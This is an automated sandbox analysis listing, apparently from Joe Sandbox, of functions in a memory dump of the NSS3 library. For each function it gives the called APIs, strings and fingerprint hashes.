Opcode Fuzzy Hash: 06a75dcdbb7bcf8ac39d79118f32863cbfce5227c7fa2a6d3b809f2ae811dad1
Instruction Fuzzy Hash: BA91CFB1A08209CFEF24DF25DA84B6BB7B1BF45318F24463DE41697A50EB34E854CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C9414E4,6C8ACC70), ref: 6C8F8D47
PR_GetCurrentThread.NSS3 ref: 6C8F8D98

Part of subcall function 6C7D0F00: PR_GetPageSize.NSS3(6C7D0936,FFFFE8AE,?,6C7616B7,00000000,?,6C7D0936,00000000,?,6C76204A), ref: 6C7D0F1B
Part of subcall function 6C7D0F00: PR_NewLogModule.NSS3(clock,6C7D0936,FFFFE8AE,?,6C7616B7,00000000,?,6C7D0936,00000000,?,6C76204A), ref: 6C7D0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C8F8E7B
htons.WSOCK32(?), ref: 6C8F8EDB
PR_GetCurrentThread.NSS3 ref: 6C8F8F99
PR_GetCurrentThread.NSS3 ref: 6C8F910A

Strings

%u.%u.%u.%u, xrefs: 6C8F8E74

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: b7e15b16ab37a13c590c38ed817a31e26809f491e94d02eab964b70f26eb7424
Instruction ID: 6aa0e5144afb4a84b0dc95bbcab391a7243c49b4df32f253152f1afde65a1c99
Opcode Fuzzy Hash: b7e15b16ab37a13c590c38ed817a31e26809f491e94d02eab964b70f26eb7424
Instruction Fuzzy Hash: F902CC329052558FDB24CF1AC558366BBA2EF43384F198B6EC8B15BBA1C335D987C790

Uniqueness

Uniqueness Score: -1.00%

Function 6C89A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C8BC3A2,?,?,00000000,00000000), ref: 6C89A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C89A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89A738

Strings

%s at line %d of [%.10s], xrefs: 6C89A6D9
database corruption, xrefs: 6C89A6D4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C89A6CA

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: 76d11a6889f6315e7b6712a82150a0dd5d33e42740c9f824fe09f44e552dd1ab
Instruction ID: 4a2103fec055d1b34eda4fd02f036b73965a3c7af4367046702533924fe45902
Opcode Fuzzy Hash: 76d11a6889f6315e7b6712a82150a0dd5d33e42740c9f824fe09f44e552dd1ab
Instruction Fuzzy Hash: B991D270A083059BC725CF6DC6806AAB7E1BF88314F554E6DE895CBB91EB30EC45C782

Uniqueness

Uniqueness Score: -1.00%

Function 6C874540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C874571
memset.VCRUNTIME140(?,00000000,00000000), ref: 6C8745B1
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C8745C2

Part of subcall function 6C8704C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C87461B,-00000004), ref: 6C8704DF
Part of subcall function 6C8704C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C87461B,-00000004), ref: 6C870534

PR_Now.NSS3 ref: 6C874626

Part of subcall function 6C8A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DC6
Part of subcall function 6C8A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DD1
Part of subcall function 6C8A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8A9DED

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C874634
memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C8746C4
PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C8746E3
PR_SetError.NSS3(?,00000000), ref: 6C874722

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
String ID:
API String ID: 1183590942-0
Opcode ID: a65305ff766d0999ee69f13561a236cf66d1e4466e2d7b8d51f47a044f3ad978
Instruction ID: f0637ed25e7fbf388b09ffe1a46c7add4775d1a03d1a086fc9c3174775748b17
Opcode Fuzzy Hash: a65305ff766d0999ee69f13561a236cf66d1e4466e2d7b8d51f47a044f3ad978
Instruction Fuzzy Hash: 8F61F1B1A046048FEB30DF68D984B9EB7F1FF99308F558A28E8459BA41E730E855CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F4420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C7F4444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7F4466

Part of subcall function 6C841200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C841228
Part of subcall function 6C841200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C841238
Part of subcall function 6C841200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C84124B
Part of subcall function 6C841200: PR_CallOnce.NSS3(6C942AA4,6C8412D0,00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C84125D
Part of subcall function 6C841200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C84126F
Part of subcall function 6C841200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C841280
Part of subcall function 6C841200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C84128E
Part of subcall function 6C841200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C84129A
Part of subcall function 6C841200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8412A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7F447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7F448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7F4494

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: d9c8449bd8ad8182a4cb5b97364abae5deb8a51168cd28ea69cad14cd5cb3f44
Instruction ID: 471250d60ec3f69db28147ade07aec45e62b5a711b26ed9a350e421bd93b31da
Opcode Fuzzy Hash: d9c8449bd8ad8182a4cb5b97364abae5deb8a51168cd28ea69cad14cd5cb3f44
Instruction Fuzzy Hash: 1111C3B2D047149BD7308F649E804A7B7F8FF5921C7044B3EE9AD92A00F371B5998790

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8FD086
PR_Malloc.NSS3(00000001), ref: 6C8FD0B9
PR_Free.NSS3(?), ref: 6C8FD138

Strings

>, xrefs: 6C8FCF5B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 5877ac6d91ec99506b0026319a7ca0910b9a5e0bf56a702de17b4ba81e329bdf
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 93D17022B4154A4BFB345C7C8EA13D9B79387833F4F584B2AD6318BBD6E6198983C351

Uniqueness

Uniqueness Score: -1.00%

Function 6C89AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e8f1a8db2137520078d5ed318621382c6d5cc3cd814c9b5717d46445d36012f
Instruction ID: 99300f89528f301f3a5f9fa3857c36867eca8cd892c2b8247a335ec027336bbe
Opcode Fuzzy Hash: 0e8f1a8db2137520078d5ed318621382c6d5cc3cd814c9b5717d46445d36012f
Instruction Fuzzy Hash: 20F1DC71F09256CBDB24CF6CDA403BA77F0AB8A308F258629D909D7B50E7749955CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8725B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6C855A85), ref: 6C872675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C872659

Part of subcall function 6C823850: TlsGetValue.KERNEL32 ref: 6C82389F
Part of subcall function 6C823850: EnterCriticalSection.KERNEL32(?), ref: 6C8238B3
Part of subcall function 6C823850: PR_Unlock.NSS3(?), ref: 6C8238F1
Part of subcall function 6C823850: TlsGetValue.KERNEL32 ref: 6C82390F
Part of subcall function 6C823850: EnterCriticalSection.KERNEL32(?), ref: 6C823923
Part of subcall function 6C823850: PR_Unlock.NSS3(?), ref: 6C823972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C872697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6C855A85,?,6C855A85), ref: 6C872717

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: fa854af784ea45c2453964959f184acdfce29278f2b09ec7a05a73b78b93e65b
Instruction ID: e22a738c74a9281c3a6824a325aa97765a0239f4e8472ce0acbd370d5b98c8bf
Opcode Fuzzy Hash: fa854af784ea45c2453964959f184acdfce29278f2b09ec7a05a73b78b93e65b
Instruction Fuzzy Hash: 76410771A08384A6EB318E18CE85FDF73A8EFD1714F20491EE99406641FB79998587E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7C8540 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 782COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000011C,automatic index on %s(%s),?,00000001), ref: 6C7C8705

Strings

automatic index on %s(%s), xrefs: 6C7C86FB
BINARY, xrefs: 6C7C8B02, 6C7C8DA2, 6C7C8E27, 6C7C8E60

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: BINARY$automatic index on %s(%s)
API String ID: 632333372-611788421
Opcode ID: 27482304c435da13e368717025c35010d49c785cc659151b751199cd3bc15356
Instruction ID: fba6e9dacb08bde311213365bbd093f987bc50b2eb84cd665b07c80bb8ef21e4
Opcode Fuzzy Hash: 27482304c435da13e368717025c35010d49c785cc659151b751199cd3bc15356
Instruction Fuzzy Hash: 216291756083429FD705CF28C580B1AB7F1BF89348F148A6EE899AB751D731EC56CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6C7B64D0 Relevance: 5.7, Strings: 4, Instructions: 724COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C7B6D47, 6C7B6D4C
WBxl, xrefs: 6C7B679E
WBxl, xrefs: 6C7B655C
authorizer malfunction, xrefs: 6C7B6E3E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID: WBxl$WBxl$authorizer malfunction$not authorized
API String ID: 0-3145024004
Opcode ID: 43c6836577de2ab747c154f4f9e9bd047e2820489e0a6a44b4c96ee826568c4c
Instruction ID: 23e22a835a383acce2d5a92c555c84c1345cda6c69cdcc23f7f5626768ed6d95
Opcode Fuzzy Hash: 43c6836577de2ab747c154f4f9e9bd047e2820489e0a6a44b4c96ee826568c4c
Instruction Fuzzy Hash: 96627F70A04204CFDB18CF19C584A697BF2FF49308F2581ADDA15EB766D736E956CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6C776F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6C77702B
*?[, xrefs: 6C777034, 6C777052, 6C777070
sz=[0-9]*, xrefs: 6C777049
noskipscan*, xrefs: 6C777067

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: e18b7fbff8bc47be3097014ba60ad9013fa7ccff64f576a92d69025756e160ad
Instruction ID: 8932f4024ca98c4b638b5635cc864e2f2fa39841c5d0a3736fef482c2a2afb89
Opcode Fuzzy Hash: e18b7fbff8bc47be3097014ba60ad9013fa7ccff64f576a92d69025756e160ad
Instruction Fuzzy Hash: B5718C32F1021D4BEF318A6DC9803AA73A2DF85354F254239CD69ABBC6D6718D46C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C80EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C80F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C80F0F9

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 900785d1a0355ba483120114a3b4c0f5b475316ef4c98cc250b0a944ce64ff82
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 1F919071B0121A8FCB24CF68CD916AEB7F1BF95324F148A2DD962A7BC0D734A905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D6410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6C7D6401,?,?,0000001C), ref: 6C7D6422
WSAGetLastError.WSOCK32(?,?,?,?,6C7D6401,?,?,0000001C), ref: 6C7D6432

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: ac496a16e48df466af2456b98ec2ab1f8054264076020c8b1a09d08cbf9257fc
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 50E01D351501086FCB019F7CDD0485A37959F08269B51CD30F539C7A71F631E5568750

Uniqueness

Uniqueness Score: -1.00%

Function 6C850E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C851052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C851086

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 03932175aac5c47a24cd6d048d14d03a8bc357e00e9225fd744f8e60b5581126
Instruction ID: 06b9670c619007ad12e4f49e45ce15bee48fac2b21e13cfc7d8f0ef9d0f27b84
Opcode Fuzzy Hash: 03932175aac5c47a24cd6d048d14d03a8bc357e00e9225fd744f8e60b5581126
Instruction Fuzzy Hash: D2A16F71F0124A9FCF58CF99C990AEEBBB6BF48318B548529E904A7700D775EC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C77AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C77AE9F
winUnlock, xrefs: 6C77AE18

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 3a7f1f39f11ca6987782c87856e6a97104b5a05b19cbfd7796bb07fea3e46d2b
Instruction ID: f3209f81ba22733ef990cac2821bd425c633321dacfd95200cbf2a3c19a06a0f
Opcode Fuzzy Hash: 3a7f1f39f11ca6987782c87856e6a97104b5a05b19cbfd7796bb07fea3e46d2b
Instruction Fuzzy Hash: 447190716082449BEB14DF28D885AAABBF5FF89318F24C628F94997241D730ED85CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C83ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C83EE3D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
